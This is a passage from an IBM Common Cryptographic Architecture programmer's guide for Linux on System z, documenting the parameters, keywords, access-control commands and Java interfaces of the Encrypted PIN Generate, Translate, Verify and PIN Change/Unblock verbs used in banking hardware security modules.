has the EPINGEN usage bit set to 1. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. Each keyword is left-justified in an 8-byte field +and padded on the right with blanks.All keywords must be in contiguous storage. The rule_array +keywords are described in Table88. +Table88.KeywordsforEncryptedPINGeneratecontrolinformation +Keyword Description +| Processingrule(One,required) +GBP-PIN ThiskeywordspecifiestheIBMGermanBankPoolInstitutionPINcalculationmethodistobeusedto +generateaPIN. +IBM-PIN ThiskeywordspecifiestheIBM3624PINcalculationmethodistobeusedtogenerateaPIN. +INBK-PIN ThiskeywordspecifiestheInterbankPINcalculationmethodistobeusedtogenerateaPIN. +PIN_length +Direction: Input Type: String +Ainteger defining the PIN length for those PIN calculation methods with variable length PINs; +otherwise, the variable should be set to zero. +data_array +Direction: Input Type: Integer +Three 16-byte character strings, which are equivalent to a single 48-byte string. The values in the data +array depend on the keyword for the PIN calculation method. Each element is not always used, but +you must always declare a complete data array. The numeric characters in each 16-byte string must +be from 1 - 16 bytes in length, uppercase, left-justified, and padded on the right with space characters. +Table89 describes the array elements. +Table89.ArrayelementsforEncryptedPINGeneratedata_arrayparameter +Arrayelement Description +Decimalization_table DecimalizationtableforIBMandGBPonly.Sixteencharactersthatareusedtomapthe +hexadecimaldigits(X'0'-X'F')oftheencryptedvalidationdatatodecimaldigits(X'0'-X'9'). +Trans_sec_parm ForInterbankonly,sixteendigits.Elevenrightmostdigitsofthepersonalaccountnumber +(PAN).Aconstantof6.Onedigitkeyselectorindex.ThreedigitsofPINvalidationdata. +Validation_data ValidationdataforIBMandIBMGermanBankPoolpaddedto16bytes.1-16charactersof +hexadecimalaccountdataleft-justifiedandpaddedontherightwithblanks. +Table90 on page 330 lists the data array elements required by the process rule (rule_array +parameter). The numbers refer to the process rule's position within the array. +Chapter9.Financialservices 329 + +Encrypted PIN Generate (CSNBEPG) +Table90.KeywordsforEncryptedPINGeneratecontrolinformation +Processrule IBM-PIN GBP-PIN INBK-PIN +Decimalization_table 1 1 +Validation_data 2 2 +Trans_sec_parm 1 +PIN_profile +Direction: Input Type:Array +A24-byte string containing the PIN profile including the PIN block format. See “The PIN profile” on +page 307 for additional information. +PAN_data +Direction: Input Type: String +A12-byte string that contains 12 digits of PersonalAccount Number (PAN) data. The verb uses this +parameter if the PIN profile specifies the ISO-0, ISO- 3, or VISA-4 or keyword for the PIN block +format. Otherwise, ensure this parameter is a 4-byte variable in application storage. The information in +this variable will be ignored, but the variable must be specified. +Note: When using the ISO-0 or ISO-3 keyword, use the 12 rightmost digits of the PAN data, excluding +the check digit. When using the VISA-4 keyword, use the 12 leftmost digits of the PAN data, +excluding the check digit. +sequence_number +Direction: Input Type: Integer +The 4-byte string that contains the sequence number used by certain PIN block formats. The verb +uses this parameter if the PIN profile specifies the 3621 or 4704-EPP keyword for the PIN block +format. Otherwise, ensure this parameter is a 4-byte variable in application data storage. The +information in the variable will be ignored, but the variable must be declared. To enter a sequence +number, do the following: +v Enter 99999 to use a random sequence number that the service generates. +v For the 3621 PIN block format, enter a value in the range from 0 - 65,535. +v For the 4704-EPP PIN block format, enter a value in the range from 0 - 255. +encrypted_PIN_block +Direction: Output Type: String +The field where the verb returns the 8-byte encrypted PIN. +Restrictions +The format control specified in the PIN profile must be NONE. +Required commands +This verb requires the commands, as shown in the following table, to be enabled in the active role based +on the keyword specified for the PIN-calculation methods. +|||| +Rule-arraykeyword Offset Command +||| IBM-PIN X'00B0' EncryptedPINGenerate-3624 +||| GBP-PIN X'00B1' EncryptedPINGenerate-GBP +||| INBK-PIN X'00B2' EncryptedPINGenerate-Interbank +| +330 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encrypted PIN Generate (CSNBEPG) +An enhanced PIN security mode is available for formatting an encrypted PIN block into IBM 3621 or 3624 +format using the PADDIGIT PIN-extraction method. This mode limits checking of the PIN to decimal digits, +and a minimum PIN length of 4 is enforced; no other PIN-block consistency checking will occur. To +activate this mode, enable the PTR Enhanced PIN Security Mode command (offset X'0313') in the active +role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBEPGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBEPGJ are shown here. +Format +public native void CSNBEPGJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] PIN_generating_key_identifier, +byte[] outbound_PIN_encrypting_key_identifier, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger PIN_length, +byte[] data_array, +byte[] PIN_profile, +byte[] PAN_data, +hikmNativeInteger sequence_number, +byte[] encrypted_PIN_block +); +Chapter9.Financialservices 331 + +Encrypted PIN Translate (CSNBPTR) +Encrypted PIN Translate (CSNBPTR) +Use the Encrypted PIN Translate verb to re-encipher a PIN block from one PIN-encrypting key to another +and, optionally, to change the PIN block format, such as the pad digit or sequence number. +The unique-key-per-transaction key derivation for single and double-length keys is available for the +Encrypted PIN Translate verb. This support is available for the input_PIN_encrypting_key_identifier and the +output_PIN_encrypting_key_identifier parameters for both REFORMAT and TRANSLAT process rules. The +rule_array keyword determines which PIN keys are derived keys. +The Encrypted PIN Translate verb can be used for unique-key-per-transaction key derivation. +Format +CSNBPTR( +return_code, +reason_code, +exit_data_length, +exit_data, +input_PIN_encrypting_key_identifier, +output_PIN_encrypting_key_identifier, +input_PIN_profile, +PAN_data_in, +PIN_block_in, +rule_array_count, +rule_array, +output_PIN_profile, +PAN_data_out, +sequence_number, +PIN_block_out ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +input_PIN_encrypting_key_identifier +Direction: Input/Output Type: String +The input PIN-encrypting key (IPINENC) for the PIN_block_in parameter specified as a 64-byte +internal key token or a key label. If keyword UKPTOPIN, UKPTBOTH, DUKPT-IP, or DUKPT-BH is +specified in the rule_array parameter, the input_PIN_encrypting_key_identifier must specify a key +token or key label of a KEYGENKY with the UKPT usage bit enabled. +output_PIN_encrypting_key_identifier +Direction: Input/Output Type: String +The output PIN-encrypting key (OPINENC) for the PIN_block_out parameter specified as a 64-byte +internal key token or a key label. If keyword UKPTOPIN, UKPTBOTH, DUKPT-IP, or DUKPT-BH is +specified in the rule_array parameter, the output_PIN_encrypting_key_identifier must specify a key +token or key label of a KEYGENKY with the UKPT usage bit enabled. +input_PIN_profile +Direction: Input Type: String +The three 8-byte character elements that contain information necessary to either create a formatted +PIN block or extract a PIN from a formatted PIN block.Aparticular PIN profile can be either an input +PIN profile or an output PIN profile depending on whether the PIN block is being enciphered or +deciphered by the verb. See “The PIN profile” on page 307 for additional information. +332 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encrypted PIN Translate (CSNBPTR) +If you choose the TRANSLAT processing rule or the REFORMAT processing rule in the rule_array +parameter, the input PIN profile and output PIN profile can have different PIN block formats. If you +specify UKPTIPIN/DUKPT-IP or UKPTBOTH/DUKPT-BH in the rule_array parameter, the +input_PIN_profile is extended to a 48-byte field and must contain the current key serial number. See +“The PIN profile” on page 307 for additional information. +The pad digit is needed to extract the PIN from a 3624 or 3621 PIN block in the Encrypted PIN +Translate verb with a process rule (rule_array parameter) of REFORMAT. If the process rule is +TRANSLAT, the pad digit is ignored. +| The PINLENnn keywords are disabled for this verb by default. If these keywords are used, return code +| 8 with reason code 33 is returned. To enable them, the PTR Enhanced PIN Security access control +| point (bit X'0313') must be enabled using a TKE. +PAN_data_in +Direction: Input Type: String +The personal account number (PAN) if the process rule (rule_array parameter) is REFORMAT and the +input PIN format is ISO-0, ISO-3 or VISA-4 only. Otherwise, this parameter is ignored. Specify 12 +digits of account data in character format. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. +For VISA-4, use the leftmost 12 digits of the PAN, excluding the check digit. +PIN_block_in +Direction: Input Type: String +The 8-byte enciphered PIN block that contains the PIN to be translated. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1, 2, or 3. +rule_array +Direction: Input Type: String +The process rule for the verb is described in Table91. +Table91.KeywordsforEncryptedPINTranslatecontrolinformation +Keyword Description +| Processingrule(One,required) +REFORMAT ChangesthePINformat,thecontentsofthePINblock,andthePIN-encryptingkey. +TRANSLAT ChangesthePIN-encryptingkeyonly.ItdoesnotchangethePINformatandthecontentsofthe +PINblock. +PINblockformat See“PINblockformatandPINextractionmethodkeywords”onpage308foradditional +andPIN informationandalistofPINblockformatsandPINextractionmethodkeywords. +extraction Note: IfaPINextractionmethodisnotspecified,thefirstonelistedinTable74onpage308for +method(Optional) thePINblockformatwillbethedefault. +| DUKPTkeywords-Singlelengthkeyderivation(One,optional) +UKPTIPIN Theinput_PIN_encrypting_key_identifierisderivedasasinglelengthkey.The +input_PIN_encrypting_key_identifiermustbeaKEYGENKYkeywiththeUKPTusagebit +enabled.Theinput_PIN_profilemustbe48bytesandcontainthekeyserialnumber. +UKPTOPIN Theoutput_PIN_encrypting_key_identifierisderivedasasinglelengthkey.The +output_PIN_encrypting_key_identifiermustbeaKEYGENKYkeywiththeUKPTusagebit +enabled.Theoutput_PIN_profilemustbe48bytesandcontainthekeyserialnumber. +Chapter9.Financialservices 333 + +Encrypted PIN Translate (CSNBPTR) +Table91.KeywordsforEncryptedPINTranslatecontrolinformation (continued) +Keyword Description +UKPTBOTH Boththeinput_PIN_encrypting_key_identifierandtheoutput_PIN_encrypting_key_identifierare +derivedasasinglelengthkey.Boththeinput_PIN_encrypting_key_identifierandthe +output_PIN_encrypting_key_identifiermustbeKEYGENKYkeyswiththeUKPTusagebit +enabled.Boththeinput_PIN_profileandtheoutput_PIN_profilemustbe48bytesandcontain +therespectivekeyserialnumber. +| DUKPTkeywords-doublelengthkeyderivation(One,optional) +DUKPT-IP Theinput_PIN_encrypting_key_identifierisderivedasadoublelengthkey.The +input_PIN_encrypting_key_identifiermustbeaKEYGENKYkeywiththeUKPTusagebit +enabled.Theinput_PIN_profilemustbe48bytesandcontainthekeyserialnumber. +DUKPT-OP Theoutput_PIN_encrypting_key_identifierisderivedasadoublelengthkey.The +output_PIN_encrypting_key_identifiermustbeaKEYGENKYkeywiththeUKPTusagebit +enabled.Theoutput_PIN_profilemustbe48bytesandcontainthekeyserialnumber. +DUKPT-BH Boththeinput_PIN_encrypting_key_identifierandtheoutput_PIN_encrypting_key_identifierare +derivedasadoublelengthkey.Boththeinput_PIN_encrypting_key_identifierandthe +output_PIN_encrypting_key_identifiermustbeKEYGENKYkeyswiththeUKPTusagebit +enabled.Boththeinput_PIN_profileandtheoutput_PIN_profilemustbe48bytesandcontain +therespectivekeyserialnumber. +output_PIN_profile +Direction: Input Type: String +The three 8-byte character elements that contain information necessary to either create a formatted +PIN block or extract a PIN from a formatted PIN block.Aparticular PIN profile can be either an input +PIN profile or an output PIN profile, depending on whether the PIN block is being enciphered or +deciphered by the verb. +v If you choose the TRANSLAT processing rule in the rule_array parameter, the input_PIN_profile and +the output_PIN_profile must specify the same PIN block format. +v If you choose the REFORMAT processing rule in the rule_array parameter, the input PIN profile and +output PIN profile can have different PIN block formats. +v If you specify UKPTOPIN or UKPTBOTH in the rule_array parameter, the output_PIN_profile is +extended to a 48-byte field and must contain the current key serial number. See “The PIN profile” +on page 307 for additional information. +v If you specify DUKPT-OP or DUKPT-BH in the rule_array parameter, the output_PIN_profile is +extended to a 48-byte field and must contain the current key serial number. See “The PIN profile” +on page 307 for additional information. +PAN_data_out +Direction: Input Type: String +The personal account number (PAN) if the process rule (rule_array parameter) is REFORMAT and the +output PIN format is ISO-0, ISO-3, or VISA-4 only. Otherwise, this parameter is ignored. Specify 12 +digits of account data in character format. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. +For VISA-4, use the leftmost 12 digits of the PAN, excluding the check digit. +sequence_number +Direction: Output Type: Integer +The sequence number if the process rule (rule_array parameter) is REFORMAT and the output PIN +block format is 3621 or 4704-EPP only. Specify the integer value 99999. Otherwise, this parameter is +ignored. +334 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encrypted PIN Translate (CSNBPTR) +PIN_block_out +Direction: Input Type: String +The 8-byte output PIN block that is re-enciphered. +Restrictions +None +Required commands +This verb requires the commands, as shown in the following table, to be enabled in the active role based +on the keyword specified for the PIN-calculation methods. +||| +Inputprofile Outputprofile +||| Rule-array formatcontrol formatcontrol +||||| keyword keyword keyword Offset Command +||||| TRANSLAT NONE NONE X'00B3' EncryptedPINTranslate-Translate +||||| REFORMAT NONE NONE X'00B7' EncryptedPINTranslate-Reformat +| +| This verb also requires the UKPT - PIN Verify_ PIN Translate command (offset X'00E1') to be enabled if +| you employ UKPT processing. +Note: Arole with offset X'00E1' enabled can also use the Encrypted PIN Verify verb with UKPT +processing. +| An enhanced PIN security mode is available for extracting PINs from a 3621 or 3624 encrypted PIN-block +| and formatting an encrypted PIN block into IBM 3621 or 3624 format using the PADDIGIT PIN-extraction +| method. This mode limits checking of the PIN to decimal digits, and a minimum PIN length of 4 is +| enforced; no other PIN-block consistency checking will occur. To activate this mode, enable the PTR +| Enhanced PIN Security command (offset X'0313') in the active role. +The verb returns an error indicating that the PAD digit is not valid if all of these conditions are met: +1. The Enhanced PIN security mode command is enabled in the active role. +2. The output PIN profile specifies 3621 or 3624 as the PIN-block format. +3. The output PIN profile specifies a decimal digit (0 - 9) as the PAD digit. +| Beginning with Release 4.1.0, three new commands are added (offsets X'0350', X'0351', and X'0352'). +| These three commands affect how PIN processing is performed as described below: +| 1. Enable theANSI X9.8 PIN - Enforce PIN block restrictions command (offset X'0350') in the active role +| to apply additional restrictions to PIN processing implemented in CCA4.1.0, as follows: +| v Do not translate or reformat a non-ISO PIN block into an ISO PIN block. Specifically, do not allow +| an IBM 3624 PIN-block format in the output_PIN_profile variable when the PIN-block format in the +| input_PIN_profile variable is not IBM 3624. +| v Constrain use of ISO-2 PIN blocks to offline PIN verification and PIN change operations in +| integrated circuit card environments only. Specifically, do not allow ISO-2 input or output PIN blocks. +| v Do not translate or reformat a PIN-block format that includes a PAN into a PIN-block format that +| does not include a PAN. Specifically, do not allow an ISO-1 PIN-block format in the +| output_PIN_profile variable when the PIN-block format in the input_PIN_profile variable is ISO-0, or +| ISO-3. +| v Do not allow a change of PAN data. Specifically, when performing translations between PIN block +| formats that both include PAN data, do not allow the input_PAN_data and output_PAN_data +| variables to be different from the PAN data enciphered in the input PIN block. +Chapter9.Financialservices 335 + +Encrypted PIN Translate (CSNBPTR) +| Note: Arole with offset X'0350' enabled also affects access control of the Clear PIN Generate +| Alternate and the Secure Messaging for PINs verbs. +| 2. Enable theANSI X9.8 PIN -Allow modification of PAN_01_0350 command (offset X'0351') in the active +| role to override the restriction to not allow a change of PAN data. This override is applicable only when +| either theANSI X9.8 PIN - Enforce PIN block restrictions command (offset X'0350') or theANSI X9.8 +| PIN -Allow onlyANSI PIN blocks_01_0350 command (offset X'0352') or both are enabled in the active +| role. This override is to support account number changes in issuing environments. Offset X'0351' has +| no effect if neither offset X'0350' nor offset X'0352' is enabled in the active role. +| Note: Arole with offset X'0351' enabled also affects access control of the Secure Messaging for PINs +| verbs. +| 3. Enable theANSI X9.8 PIN -Allow onlyANSI PIN blocks_01_0350 command (offset X'0352') in the +| active role to apply a more restrictive variation of theANSI X9.8 PIN - Enforce PIN block restrictions +| command (offset X'0350'). In addition to the previously described restrictions of offset X'0350', this +| command also restricts the input_PIN_profile and the output_PIN_profile to contain only ISO-0, ISO-1, +| and ISO-3 PIN block formats. Specifically, the IBM 3624 PIN-block format is not allowed with this +| command. Offset X'0352' overrides offset X'0350'. +| Note: Arole with offset X'0352' enabled also affects access control of the Secure Messaging for PINs +| verbs. +| For more information, see “ANSI X9.8 PIN restrictions” on page 306. +Usage notes +Some PIN block formats are known by several names. The following table shows the additional names. +Table92.AdditionalnamesforPINformats +PINformat Additionalname +ISO-0 ANSIX9.8,VISAformat1,ECIformat1 +ISO-1 ECIformat4 +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBPTRJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBPTRJ are shown here. +336 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encrypted PIN Translate (CSNBPTR) +Format +public native void CSNBPTRJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] input_PIN_encrypting_key_identifier, +byte[] output_PIN_encrypting_key_identifier, +byte[] input_PIN_profile, +byte[] input_PAN_data, +byte[] input_PIN_block, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] output_PIN_profile, +byte[] output_PAN_data, +hikmNativeInteger sequence_number, +byte[] output_PIN_block +); +Chapter9.Financialservices 337 + +Encrypted PIN Verify (CSNBPVR) +Encrypted PIN Verify (CSNBPVR) +Use the Encrypted PIN Verify verb to verify that one of the following customer selected trial PINs is valid: +v IBM 3624 (IBM-PIN) +v IBM 3624 PIN offset (IBM-PINO) +v IBM German Bank Pool (GBP-PIN) +v VISAPIN validation value (VISA-PVV) +v VISAPIN validation value (VISAPVV4) +v Interbank PIN (INBK-PIN) +The unique-key-par-transaction key derivation for single and double-length keys is available for the +input_PIN_encrypting_key_identifier parameter. +Format +CSNBPVR( +return_code, +reason_code, +exit_data_length, +exit_data, +input_PIN_encrypting_key_identifier, +PIN_verifying_key_identifier, +input_PIN_profile, +PAN_data, +encrypted_PIN_block, +rule_array_count, +rule_array, +PIN_check_length, +data_array ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +input_PIN_encrypting_key_identifier +Direction: Input/Output Type: String +The 64-byte key label or internal key token containing the PIN-encrypting key (IPINENC) that +enciphers the PIN block. If keyword UKPTIPIN or DUKPT-IP is specified in the rule_array, the +input_PIN_encrypting_key_identifier must specify a key token or key label of a KEYGENKY with the +UKPT usage bit enabled. +PIN_verifying_key_identifier +Direction: Input/Output Type: String +The 64-byte key label or internal key token that identifies the PIN verify (PINVER) key. +input_PIN_profile +Direction: Input Type: String +The three 8-byte character elements that contain information necessary to either create a formatted +PIN block or extract a PIN from a formatted PIN block.Aparticular PIN profile can be either an input +PIN profile or an output PIN profile depending on whether the PIN block is being enciphered or +deciphered by the verb. If you specify UKPTIPIN in the rule_array parameter, the input_PIN_profile is +extended to a 48-byte field and must contain the current key serial number. See “The PIN profile” on +page 307 for additional information. +338 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encrypted PIN Verify (CSNBPVR) +If you specify DUKPT-IP in the rule_array parameter, the input_PIN_profile is extended to a 48-byte +field and must contain the current key serial number. See “The PIN profile” on page 307 for additional +information. +The pad digit is needed to extract the PIN from a 3624 or 3621 PIN block in the Encrypted PIN Verify +verb. +| The PINLENnn keywords are disabled for this verb by default. If these keywords are used, return code +| 8 with reason code 33 is returned. To enable them, the PTR Enhanced PIN Security access control +| point (bit X'0313') must be enabled using a TKE workstation. +PAN_data +Direction: Input Type: String +The personal account number (PAN) is required for ISO-0, ISO-3 and VISA-4. Otherwise, this +parameter is ignored. Specify 12 digits of account data in character format. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. +For VISA-4, use the leftmost 12 digits of the PAN, excluding the check digit. +encrypted_PIN_block +Direction: Input Type: String +The 8-byte enciphered PIN block that contains the PIN to be verified. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1, 2, or 3. +rule_array +Direction: Input Type: String +The process rule for the PIN verify algorithm, described in Table93. +Table93.KeywordsforEncryptedPINVerifycontrolinformation +Keyword Description +| Algorithmvalue(One,required) +GBP-PIN TheIBMGermanBankPoolPIN.ItverifiesthePINenteredbythecustomerandcomparesthat +PINwiththeinstitutiongeneratedPINbyusinganinstitutionkey. +IBM-PIN TheIBM3624PIN,whichisaninstitution-assignedPIN.ItdoesnotcalculatethePINoffset. +IBM-PINO TheIBM3624PINoffset,whichisacustomer-selectedPINandcalculatesthePINoffset. +INBK-PIN TheInterbankPINverifyalgorithm. +VISA-PVV TheVISAPINverifyvalue. +VISAPVV4 TheVISAPINverifyvalue.Ifthelengthis4digits,normalprocessingforVISA-PVVwilloccur. +PINblock See“PINblockformatandPINextractionmethodkeywords”onpage308foradditionalinformation +formatandPIN andalistofPINblockformatsandPINextractionmethodkeywords. +extraction +| method ThePINLENnnkeywordsaredisabledforthisverbbydefault.Ifthesekeywordsareused,return +| (Optional) code8withreasoncode33isreturned.Toenablethem,thePTREnhancedPINSecurityaccess +| controlpoint(bitX'0313')mustbeenabledusingaTKEworkstation. +Note: IfaPINextractionmethodisnotspecified,thefirstonelistedinTable74onpage308for +thePINblockformatwillbethedefault. +DUKPTkeyword-singlelengthkeyderivation(Optional) +Chapter9.Financialservices 339 + +Encrypted PIN Verify (CSNBPVR) +Table93.KeywordsforEncryptedPINVerifycontrolinformation (continued) +Keyword Description +UKPTIPIN Theinput_PIN_encrypting_key_identifierisderivedasasinglelengthkey.The +input_PIN_encrypting_key_identifiermustbeaKEYGENKYkeywiththeUKPTusagebitenabled. +Theinput_PIN_profilemustbe48bytesandcontainthekeyserialnumber. +DUKPTkeyword-doublelengthkeyderivation(Optional) +DUKPT-IP Theinput_PIN_encrypting_key_identifieristobederivedusingtheDUKPTalgorithm.The +input_PIN_encrypting_key_identifiermustbeaKEYGENKYkeywiththeDUKPTusagebit +enabled.Theinput_PIN_profilemustbe48bytesandcontainthekeyserialnumber. +PIN_check_length +Direction: Input Type: String +The PIN check length for the IBM-PIN or IBM-PINO process rules only. Otherwise, it is ignored. +Specify the rightmost digits, 4 - 16, for the PIN to be verified. +data_array +Direction: Input Type: Integer +Three 16-byte elements required by the corresponding rule_array parameter. The data array consists +of three 16-byte fields whose specification depend on the process rule. If a process rule requires only +one or two 16-byte fields, the rest of the data array is ignored by the verb. Table94 describes the +array elements. +Table94.ArrayelementsforEncryptedPINVerifydata_arrayparameter +Arrayelement Description +Decimalization_table DecimalizationtableforIBMandGBPonly.Sixteendecimaldigitsof0-9. +PIN_offset OffsetdataforIBM-PINO.Onetotwelvenumericcharacters,0-9,left-justifiedand +paddedontherightwithblanks.ForIBM-PINO,thePINoffsetlengthisspecifiedin +thePIN_check_lengthparameter.ForIBM-PINandGBP-PIN,thefieldisignored. +Trans_sec_parm ForVISA,onlytheleftmosttwelvedigitsofthe16-bytefieldareused.Theseconsistof +therightmostelevendigitsofthepersonalaccountnumber(PAN)andaone-digitkey +index.Theremainingfourcharactersareignored. +ForInterbankonly,all16bytesareused.Theseconsistoftherightmostelevendigits +ofthePAN,aconstantofX'6',aone-digitkeyindex,andthreenumericdigitsofPIN +validationdata. +RPVV ForVISA-PVVonly,referencedPVV(fourbytes)thatisleft-justified.Therestofthe +fieldisignored. +Validation_data ValidationdataforIBMandGBPpaddedto16bytes.1-16charactersofhexadecimal +accountdataleft-justifiedandpaddedontherightwithblanks. +Table95 lists the data array elements required by the process rule (rule_array parameter). The +numbers refer to the process rule's position within the array. +Table95.Arrayelementsrequiredbytheprocessrule +Processrule IBM-PIN IBM-PINO GBP-PIN VISA-PVV INBK-PIN +Decimalization_table 1 1 1 +Validation_data 2 2 2 +PIN_offset 3 3 3 +Trans_sec_parm 1 1 +RPVV 2 +340 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encrypted PIN Verify (CSNBPVR) +Restrictions +None +Required commands +This verb requires the following commands to be enabled in the active role: +Rule-arraykeyword Offset Command +IBM-PIN,IBM-PINO X'00AB' EncryptedPINVerify-3624 +GBP-PIN X'00AC' EncryptedPINVerify-GBP +VISA-PVV,VISAPVV4 X'00AD' EncryptedPINVerify-VISAPVV +INBK-PIN X'00AE' EncryptedPINVerify-Interbank +| This verb also requires the UKPT - PIN Verify_ PIN Translate command (offset X'00E1') to be enabled in +| the active role if you employ UKPT processing. +Note: Arole with offset X'00E1' enabled can also use the Encrypted PIN Translate verb with UKPT +processing. +| An enhanced PIN security mode is available for extracting PINs from a 3621 or 3624 encrypted PIN-block +| using the PADDIGIT PIN-extraction method. This mode limits checking of the PIN to decimal digits, and a +| minimum PIN length of four is enforced. No other PIN-block consistency checking will occur. To activate +| this mode, enable the PTR Enhanced PIN Security command (offset X'0313') in the active role. +Usage notes +None +Related information +The algorithms are discussed in detail inAppendixE, “PIN formats and algorithms,” on page 477. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBPVRJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBPVRJ are shown here. +Format +public native void CSNBPVRJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] PIN_encrypting_key_identifier, +byte[] PIN_verifying_key_identifier, +byte[] PIN_profile, +byte[] PAN_data, +byte[] encrypted_PIN_block, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger PIN_check_length, +byte[] data_array +); +Chapter9.Financialservices 341 + +PIN Change/Unblock (CSNBPCU) +PIN Change/Unblock (CSNBPCU) +The PIN Change/Unblock verb is used to generate a special PIN block to change the PIN accepted by an +integrated circuit card (smartcard). The special PIN block is based on the new PIN and the card-specific +diversified key and, optionally, on the current PIN of the smartcard. The new PIN block is encrypted with a +session key. The session key is derived in a two-step process. First, the card-specific diversified key (ICC +Master Key) is derived using the TDES-ENC algorithm of the Diversified Key Generate verb. The session +key is then generated according to the rule_array algorithm: +v TDES-XOR - XOR ICC Master Key with theApplication Transaction Counter (ATC) +v TDESEMV2 - use the EMV2000 algorithm with a branch factor of 2 +v TDESEMV4 - use the EMV2000 algorithm with a branch factor of 4 +The generating DKYGENKY cannot have replicated halves. The encryption_issuer_master_key_identifier is +a DKYGENKY that permits generation of a SMPIN key. The authentication_issuer_master_key_identifier is +also a DKYGENKY that permits generation of a double length MAC key. +The PIN block format is specified by the VISAICC Card specification: two mutually exclusive rule_array +keywords, VISAPCU1 and VISAPCU2. They refer to whether the current PIN is used in the generation of +the new PIN. For VISAPCU1, it is not used, for VISAPCU2 it is used. +Format +CSNBPCU( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +authentication_issuer_master_key_length, +authentication_issuer_master_key_identifier, +encryption_issuer_master_key_length, +encryption_issuer_master_key_identifier, +key_generation_data_length, +key_generation_data, +new_reference_PIN_key_length, +new_reference_PIN_key_identifier, +new_reference_PIN_block, +new_reference_PIN_profile, +new_reference_PIN_PAN__data, +current_reference_PIN_key_length, +current_reference_PIN_key_identifier, +current_reference_PIN_block, +current_reference_PIN_profile, +current_reference_PIN_PAN__data, +output_PIN_data_length, +output_PIN_data, +output_PIN_profile, +output_PIN_message_length, +output_PIN_message ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +342 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PIN Change/Unblock (CSNBPCU) +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1 or 2. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. The keywords are left-justified in an 8-byte field +and padded on the right with blanks. The keywords must be in contiguous storage. The rule_array +keywords are described in Table96. +Table96.KeywordsforPINChange/Unblockcontrolinformation +Keyword Description +| Algorithm(One,optional) +TDES-XOR TDESenciphercleardatatogeneratetheintermediate(card-unique)key,followedbyXORofthefinal +twobytesofeachkeywiththeATCcounter.Thisisthedefault. +TDESEMV2 SameprocessingasintheDiversifiedKeyGenerateverb. +TDESEMV4 SameprocessingasintheDiversifiedKeyGenerateverb. +| PINprocessingmethod(One,required) +VISAPCU1 FormthenewPINfromthenewreferencePINandtheintermediate(card-unique)keyonly. +VISAPCU2 FormthenewPINfromthenewreferencePIN,theintermediate(card-unique)keyandthecurrent +referencePIN. +authentication_issuer_master_key_length +Direction: Input Type: Integer +The length of the authentication_issuer_master_key_identifier parameter. Currently, the value must be +64. +authentication_issuer_master_key_identifier +Direction: Input/Output Type: String +The label name or internal token of a DKYGENKY key type that is to be used to generate the +card-unique diversified key. The control vector of this key must be a DKYL0 key that permits the +generation of a double-length MAC key (DMAC). This DKYGENKY might not have replicated key +halves. +encryption_issuer_master_key_length +Direction: Input Type: Integer +The length of the encryption_issuer_master_key_identifier parameter. Currently, the value must be 64. +encryption_issuer_master_key_identifier +Direction: Input/Output Type: String +The label name or internal token of a DKYGENKY key type that is to be used to generate the +card-unique diversified key and the secure messaging session key for the protection of the output PIN +block. The control vector of this key must be a DKYL0 key that permits the generation of a SMPIN key +type. This DKYGENKY might not have replicated key halves. +key_generation_data_length +Direction: Input Type: Integer +The length of the key_generation_data parameter. This value must be 10, 18, 26, or 34 bytes. +key_generation_data +Direction: Input Type: String +Chapter9.Financialservices 343 + +PIN Change/Unblock (CSNBPCU) +The data provided to generate the card-unique session key. For TDES-XOR, this consists of 8 or 16 +bytes of data to be processed by TDES to generate the card-unique diversified key followed by a +16-bitATC counter to offset the card-unique diversified key to form the session key. For TDESEMV2 +and TDESEMV4, this can be 10, 18, 26, or 34 bytes. See “Diversified Key Generate (CSNBDKG)” on +page 113 for more information. +new_reference_PIN_key_length +Direction: Input Type: Integer +The length of the new_reference_PIN_key_identifier parameter. Currently, the value must be 64. +new_reference_PIN_key_identifier +Direction: Input/Output Type: String +The 